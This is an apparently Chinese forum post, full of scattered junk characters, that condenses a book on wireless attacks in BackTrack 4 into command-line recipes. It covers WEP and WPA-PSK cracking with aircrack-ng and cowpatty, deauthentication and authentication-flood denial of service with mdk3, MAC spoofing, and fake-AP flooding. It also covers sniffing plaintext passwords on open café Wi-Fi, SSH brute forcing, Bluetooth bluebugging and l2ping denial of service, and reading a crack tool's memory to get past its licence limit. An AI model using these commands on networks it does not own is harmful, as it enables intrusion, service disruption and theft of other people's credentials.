少校
- 注册时间
- 2008-11-14
- 金币
- 2275 个
- 威望
- 7 个
- 荣誉
- 6 个
累计签到:14 天 连续签到:0 天 [LV.20]漫游旅程
|
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。% {0 U- _6 f2 b: {; R* p
! w3 Q" ~) z& ?以下所有操作均在BackTrack 4中进行。
+ `7 Y9 q7 ?& L# ~" _$ E, I
; A4 r9 l" P. ~/ m
6 b" v9 C3 l* ~无线WEP加密P解:
. S( |- d% U0 _9 K- F: c2 N# x6 E0 M. T+ R$ m. [: f
注入P解:, f0 z g# c2 Z- c( K7 K! S
( z* w5 O! p5 I' k0 w( q
ifconfig8 \$ B3 e w$ f
7 T2 }& |, B2 b
ifconfig –a
! Z/ w) W9 i' L2 D8 v
6 `8 T3 @( t n. Xifconfig wlan0(无线网卡) up
! Y3 |: |- J s/ v0 d% g
& Q* N% N) W; G o* ^8 aairmon-ng start wlan0
+ \6 B* _! M# X3 O' p q& b1 t" d& \, A; S: s3 b2 ?. j, E
airodump-ng mon0/ M% W& r O# U1 |: y0 K3 v
/ V/ Q( h9 {. {% Z* ^8 [airodump-ng --ivs –w ivsfile –c 频道 mon0或
' H2 ?+ s9 d+ m7 a9 g$ S+ A9 Z, w# Q# m4 U0 M& |/ a7 d
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon01 C; R" Z. V3 [& t& J# f8 X
3 A* Z$ \+ Z+ F* F) Saireplay-ng -3 –b BSSID –h Station mon0
3 z7 o' B6 k2 h' v' z' k1 q0 I
# r+ B) ]# s$ caircrack-ng ivsfile-01.ivs4 S: f4 o/ Z# G% f1 \, a* F: n
9 _. y2 \) e& x" P2 t' E5 z
虚连接P解(适用于无客户端连接APP解)
! H/ V, |. K3 O" P6 X+ r1 F8 O7 v/ k; h% u
ifconfig
D7 u' V" t' r( f# y" a
& `6 q% W" H, [8 w9 Cifconfig –a
. s" s5 ?# c' ~3 {8 }$ `! y- e4 V2 a) H0 M( w7 g8 y* ]
ifconfig wlan0(无线网卡) up& S$ X) t9 m+ R% V0 F
3 | K- T# u2 j. r% N! bairmon-ng start wlan0
! B' l3 t# D% R" S* h( f$ `7 P _7 O- Q% x* o
airodump-ng mon0
' a, `/ g% f$ L# g8 p2 p0 ^3 Y2 ], y _8 T7 z
airodump-ng --ivs –w ivsfile –c 频道 mon0或
( m5 r( b$ C a7 A' H! m" r! ?/ \4 T7 S p# R2 Z
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
3 Y" N0 _% X& ~0 L) Z5 v* _
) W @/ `6 i# k8 ]' q: ?+ @! Taireplay-ng -1 0 –e SSID –a BSSID –c Station mon0. v% b+ m" i m0 {/ \7 C
$ S# A8 s# b7 Haireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon08 @6 J0 Q" q. b6 ~0 d5 [6 I
; B+ i# D ?' F4 qaircrack-ng ivsfile-01.ivs( \+ \: d% I, f- A6 g" f
8 p6 t+ l* B. A: o# _$ O* |
: k3 e; \5 t6 k6 t还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
) A1 t6 F9 i- T( ^0 n) v5 [
# i) T3 n# j7 N/ e+ o4 O/ P" b" u- J% e5 k
WPA-PSKP解
7 L2 q: n! C5 ?) B" l! {
1 ~$ V! Y7 b! A" A1 F4 j$ Sifconfig
7 F2 K4 V! O2 R1 p$ N* D$ `* [' _& O- m$ B9 o/ ?/ W; q
ifconfig –a
3 F. J6 |. {. G5 Z
# E. T( E6 H+ {6 J# ?ifconfig wlan0(无线网卡) up
! r2 ~9 L2 I0 M* h6 N/ [" W' e0 I
4 V- ]8 O% l8 ^airmon-ng start wlan0
0 S9 f; l) P2 P$ q: \9 K
9 x1 S+ c7 D' n1 W; [8 Oairodump-ng mon0
2 x# {1 g, d) s# @$ }- b2 t% n5 X. Q$ d! X
airodump-ng –w capfile –c 频道 mon0
) ^3 ]' h2 ~8 G' B" @3 C6 i# e; X- `& o3 T
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
: f) Y$ h7 K9 C+ p/ w% }% o2 Z( W; v3 \+ G3 _1 x# `% I$ E
aircrack-ng –w Dic capfile-01.cap或
$ o2 e- U% P+ h/ Q" x! g- M5 F3 p! H6 V7 t4 _
cowpatty –f Dic –r capfile-01.cap –s SSID
" X s) d5 r8 j+ N- ]% C, c& S$ } w+ J- J2 n
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID5 z+ K* ]3 |, ?& d" t
8 L) q3 v& |7 y* Y `6 i
傻瓜式P解软件SpoonWPA。8 [! q* }2 ]/ k9 z
9 y% r# h- W! i7 dBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst2 x; g7 H9 f% U; T+ M; E6 d& v0 _* t
, c9 f* H/ B4 Q% s$ o& |$ w3 W7 h
4 u5 }3 U, {7 H: k8 b" q字典文件的生成和上传/ _, r& e$ A& O6 V y/ k
. I, K! A0 M3 o1 c
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。" x$ F1 M, ]9 |# [3 C3 ]/ ]8 l \
; A2 x, j9 w" y+ s+ H' C
& i7 F; {, n+ E( j8 ~BT4下开启Tftp:Services—TFTPD—start TFTPD$ F1 Q4 D A) O! |: n
- }# Y5 W v) @8 o3 w0 H4 i( t6 L在Windows的CMD中运行 tftp –i IP put **.dic7 a; p3 U% G- k1 z- V4 O+ l" x
c7 u& O; D# o
+ d( o. n( Y% D |$ ]3 E6 s; J8 \BT4下开启SSH:Services—SSH—start SSH$ @) T/ W+ N% W+ t& n( g
, H+ i3 } N" N" i# U) f5 o9 l1 z1 ~
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root/ X1 l& ~) y& }* r: \+ N& n
& M: {$ ~. c3 q8 [% }. q
/ \) o6 M) T, }2 U. P7 o
AP限制MAC时的解决6 G" O1 V, p/ n( H: Z
- D7 q* X' V/ z3 j3 j1 A1 {
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:$ x1 ?- j" H+ ^
6 j, [! w% S% B H
ifconfig wlan0 hw ether NewMAC* U% i: f k0 s( g
/ u+ ]- C. O P- C( @: o
8 k3 g! \6 p/ S% @0 N* N t关闭SSID广播的AP探测:
) g+ }0 E) d5 _" c' B, F
* n; Z2 H& J8 R' k1. Deauth攻击:
, m8 z7 @ i- r- q6 R6 S( W- w4 d+ k4 K# W/ I
airodump-ng mon0
; B, y' p4 g( B3 \& m) n
$ t2 {0 s5 r3 ~) \8 s+ M5 O; Raireplay-ng -0 10 –a BSSID –h Station mon06 N: d: _& g* T7 |) ^
; f( [# C* f) r9 M, B l- C
2. 抓包分析
/ T, i/ ^* q `+ d8 Q- E3 G- _9 y
1 v3 V0 E$ H4 C2 O' v eOmnipeek2 E$ d% Z a' k; V; d
' O; d' I' Z; M& y! c( t) ]Tcpdump –n –e –vvv –i 网卡名% i7 T- @6 P9 x* @! [7 e* y8 {
# b, w \: e. Z/ k M( L$ h7 O- k0 w% x2 [
3. 暴力P解
! e: a4 Q% g4 D" Z! L9 k; D' c( k; u! _. @" H( i `& d
Charon 1.1暴力P解
+ K; E0 j z5 e5 Y: j& I5 x0 @6 L' r
) ~% `* I! m+ b0 ~' D4 e; ^
8 U6 Y2 n4 p# h6 n+ Y, i7 @无线加密数据包的解密# f9 }3 b& x5 |0 F* w0 ]
/ r+ [2 \* k* G @( o+ p/ i- D* z- } o
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
f1 w& c! q8 `0 H
0 |4 R5 E- j2 _/ L& {4 j& RFilterNS DNS解析数据包
9 Y- q7 w* t/ a0 z+ a3 U
; d% b( }. @1 i- CFilter:HTTP WEB访问数据包; j7 U( Q# U: q
( i( w: L1 I3 o( l- b- U6 E/ _2 `
Filter:msnms MSN
3 O( d, N: h7 c2 o1 p% o% W o' _: ^6 ^3 z) ^+ q W' R
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。5 b# e9 b! T3 X& x( k' N8 G* i2 F; }
4 F: R+ ^7 J C, j% g: K" P: ]8 w/ m使用airdecap-ng解密:( H# ?# f" k$ K; ]2 a& E
* G# c* u( P3 O4 {% L0 ?Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
, B: w8 D+ a8 O- V+ ?6 J- h; S, R* H, h7 ?
! ?. f2 g) q, `& l5 f% {, _
咖啡馆中无线数据截取(开放式无加密AP)( E9 a2 f9 D; A
3 |2 S6 e. ^; |- X1.Airodump-ng –w data –c频道 mon0' n, }/ V) J l& x& }( ?. r
( N+ x1 N. Q6 j) ?2.使用WireShark打开分析1 S% T' P: F' y/ X; o
/ s1 `6 \9 R. D6 G4 x! O# _& L, L' q7 k9 v- }
BT4下的渗透工具:
" b; t B% t8 R( } a
+ X# x Y3 s/ i/ f1 B( jnmap –sP IP/24 判断C段下存活的主机 $ P- R3 @9 P" `% f
4 `* ~% S0 j& w8 ?3 X, enmap –vv –sS IP/24 –p Port 扫描指定端口是否开放1 }8 n+ F$ c* @5 L* E1 G
`! ~& O9 b" G: h7 I& M$ ^nmap –vv –sV IP –p port 指定端口的详细信息。。。
# M G+ }9 T* C6 h4 A
7 l( s6 D% q& a6 t/ Cnamp –O IP/24 判断主机的系统版本; Q# Z/ X, N4 J2 M: s" `$ A3 e
* d4 D' ?* C/ i& b' n
1 B# D5 U( X6 W2 j. \3 y
GUI 版nmap:Zenmap , ?, K7 o1 |4 l3 |5 h
0 W( W0 y* G5 q5 O: o/ K9 | s- P3 A% X/ m/ j
Amap使用:amap –B IP port: k4 k" s3 V. ~! u3 g2 u
1 \! L( H- }5 j1 \7 r
Nbtscan(扫描Windows网络NetBios信息):& s d% s7 V$ V' `
7 I) f8 ^' C/ j8 p! Q6 Knbtscan –v –s : IP/24
. E8 N$ p5 J. _5 v6 Z, ~
7 o2 T3 a# Z2 C$ Z9 M, i8 c2 ` Hnbtscan –r IP
: R$ `- P: X6 N& ?7 a1 k$ s1 z+ S) W
A& r9 E4 b% t* S6 Y a' _
! H- |0 x$ X8 m% |2 KDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.6 Q/ i5 S8 Z- f, A- U: G1 J* F
; F" b: ?- }) P$ P# ` e3 ]0 L. }8 l6 W/ J7 i' J, U
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks); s; X/ w# w8 N a& a4 N- H% g8 V
3 N9 R3 y# c6 d0 JBruteSSH: ./bruthe.py –h IP –u Username –d Dic
! I, D: ?! B8 n5 k P. c( m
# X. U/ |. R) t% F7 ], \ d- aMetasploit3使用1 H7 O3 r. H' W$ H" `" z5 e
无线D.0.S. _1 R2 o0 N1 R3 _6 o& T$ j, w
6 D o R; C7 z( m. u) d0 T2 ]% s9 L1 P- a" d, \3 N
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
; G8 O: n7 a3 d5 q0 r' _; q
* Q6 S9 h* ?& jairmon-ng start wlan0, y" ^# ~, i' W( C) Q
) ^( C3 @. `+ ?% @6 {
airodump-ng mon0: X: [7 R( [1 H# f$ g+ n
+ p7 @# M* {# L9 Bmdk3 mon0 a –a BSSID
! h" b# |" x9 o! a0 H9 s4 y) K
8 L( U/ [- N; x/ f! ^2 m% Y对所有的AP攻击:mdk3 mon0 a* E4 s$ V% @2 H9 [$ ]% S
* r' {: y2 _5 U q( p
/ _- M$ w G" |" eDeauth Flood 攻击5 W" @8 ~8 r& }
7 i4 L! p- t$ c' v0 y1 Emdk3 mon0 d –c Channel- T& \' d0 G N8 j( t2 {& \
% g, ?1 }- P! u* L图形化D.O.S攻击:Charon
4 T0 w8 o0 f |0 l% X! j4 y- }- k3 e: x5 a8 F b
5 {; D: L5 [3 \2 G
当受到攻击时,使用Wireshark抓包可以看到异常信息。
4 v0 _! t9 v( l I W& ^5 i5 ~3 q# I4 H4 ], V# u2 Z4 V3 v
$ G N9 g3 J( C y) R2 U
WPA-PSK高速P解# c% g9 p @$ Q8 K A7 C7 ~+ E+ Y6 P
6 G) u9 p% C$ \* W- K1. WPA-PSK PMK Hash TablesP解9 w+ s$ B2 F* D: h( Q7 a! l% |
. N) { @7 m$ a q [6 E
Cowpatty –d HashTable.hash –r ***.cap –s SSID, z) z' H. @+ d: x" o8 f3 C
" E/ N( z( g- g0 A+ h% ?; R
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
4 l: k- L0 l9 Z( i+ [$ Q& g2 E6 N: z. U; O, y( f, u5 C Z. }
2. GPU辅助高速P解
0 ]5 h: ~: N7 c! T5 s1 c' p% h
( c1 j+ d# ^) V' S2 g5 q2 N6 G使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
3 E% A# R, [3 d/ t4 {" _# v7 S, T# O- y5 K( o2 u
3. 分布式P解
$ z7 E4 x" A# b( J, d. |: A. f3 C4 A
* s1 _/ `. o* F5 T5 wAP的伪造$ q! ~& ~+ ?, {, `9 }: p- w
5 `3 F! [6 o3 P( A& [
把AP的MAC改成目标AP的MAC
" H$ \4 Z" m' [5 {5 F3 d" b' l; N$ [
网卡软AP( J% }. q* ^: ^/ n! y( O
' ]9 _4 R W+ {
+ A3 r1 J1 g& F2 ~! U+ F+ R: _; h伪造大量虚假AP信号:; u7 f9 E# z# p) T% L2 h9 {
0 N# v! R1 [7 W. |
随机SSID:mdk3 mon0 b –g –c 频道
5 Q/ X4 \0 v8 J
' M! e4 H8 x5 w% Z' V W3 X u指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度1 h0 ]# Y8 B7 ?* M% b; V
9 z& k1 K& P8 |2 T1 y5 g# W
/ U O/ ]$ A, Y2 Q3 \- _
War-Driving% b8 M! b1 K, o
! _) g5 Y. R, a# I% Y, C' d热点地图绘制: P6 @7 a8 p9 c
; ?* Y: ]' M& {; d/ D, B W7 U
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。7 U3 \* x8 Q7 I- }
2 F- F; } m3 r+ b1 _- l3 [7 K8 p# K5 b1 Q5 ]
Netstumble* P, m8 R& ~: ]3 Y2 C( H, @8 @+ l
0 D. f4 x8 g7 |5 I0 \
% c$ m3 L. h6 t) ~$ M% L
蓝牙Hacking
$ o$ ]9 p( Y% m" u c, j# R% J# r. g; J
Windows下的Blue Soleil工具7 S( |9 _7 b/ f- N
% P# \: C" H7 ^% ?7 g$ y, A! {BT4:
& @2 X/ A: w. b, X3 E' _- t1 B
) @8 X8 ^& j9 W1 hhciconfig 查看蓝牙适配器
( P* V' O. S% x! @. h. B: @# G) |* F( f4 Q. p$ f7 F. L6 O8 v+ r. Q
hciconfig hci0 up 载入蓝牙适配器
7 L7 r- e% n+ ~9 a8 q/ M" N5 c
4 k. M8 z. [9 h* ?( h Z$ a6 Jhciconfig hci0 class 蓝牙适配器详细信息
5 @4 \ W$ u% g5 e1 j0 Q$ M( B# v+ Q5 o* Y& Q
# h% @0 ]( W( G
hcitool(扫描蓝牙)
' Z5 \9 M2 c7 V: r4 Z/ j5 B; f+ f! _2 |
hcitool –i hci0 scan2 c" H4 ~9 b: i" N7 u% Z$ O
- m5 P1 Z- M% X, O5 w4 I- dBTscanner(扫描蓝牙)
: F# N- g9 l8 ~* k. ]" S! T6 f
0 X9 c: T# R( D. R- q; t* N" m* o$ W0 g, j% K
蓝牙攻击:
2 i7 r! h' O6 E# Q* \* X. y1 e& { i3 Q' `1 o2 W
BlueBugging (适用于BlueTooth V1.1的手机)
+ q& v2 u+ R' O& U& @. T
; S/ c: h' n% J, _( N* W- zBluebugger工具:
" c/ V* D' J F# O
, m% l, U/ V% |1 s$ hBulebugger –a HD_Addr info
" H9 z% t. b- G7 x5 K: ]
8 |7 X C6 p) o9 P6 m8 S
2 o4 K) h8 \( g. f1 RBlueJacking
$ j: J2 ^/ o2 K" \8 ?5 F
) z* z1 s% B4 G7 R Q实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。, ?# S8 f( W! _- v
$ d8 ]! c' G& u0 N. }" c
- ]: I4 [7 ~' _+ m% R# `# u8 A5 sHD_Addr修改:
, \& J# k0 n ?) \1 \* S7 X3 X; L( f3 S
Bdaddr工具
* _& M: t& m/ \3 M
; j! w+ d; u; y) o8 Lbdaddr –i 蓝牙设备名 新HD_addr
% Z/ N1 f m) F. U9 d1 ^# B' A" b. B$ N+ Q! r5 O* U3 R
' F& V. q7 D$ I# E" t) i
蓝牙D.O.S6 b2 m6 T. Q9 g
. p+ h- \! W7 b1 F& M) ?
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
* e5 {) K4 p/ s% x w( D p+ I! P7 J; J+ J
hciconfig1 w2 S/ C* L0 H6 P8 p+ V& Q, N
* g6 `' ?" i+ v
hciconfig hci0 up+ N+ }$ y/ T A! `
2 \3 ?8 g7 u0 x O3 _6 p/ ghcitool –i hci0 scan
& @6 Z0 l/ K1 Q# \" Q( ~- Y2 M/ Q: T% u" {
l2ping –s 10000 –目标MAC
* o8 ~# S. g K' O4 F
2 D) l5 C' b ?* T' L+ R
8 g0 x) b1 N! ^+ @0 v1 g4 w不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)+ o Q4 y) \" ?3 |! {. V4 J D9 C
1 K% S& a7 ~% x" K
./fang –r ************-############ -s, o# n" A; `" x. H
! B5 M8 P+ _2 N, \% z% J4 i
暴力P解************-############的蓝牙设备
8 D6 n- [: B" j
: Q) i' T* M7 N! E./fang –l 各厂商BD_Addr分配
* ^& a, x0 X& K) R
5 F' C: O: U% \: {- W
/ m+ o1 @: r* M- C WWifiZoo使用$ f3 E8 w1 ]4 u& J* k
! |0 X5 y3 O- ]
./wifizoo.py –c Capfile
4 H5 e" [! K# @, G3 |& ]2 R: x, a* A* E1 ^9 C$ ^: p' j( d
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情 |
评分
-
2
查看全部评分
-
|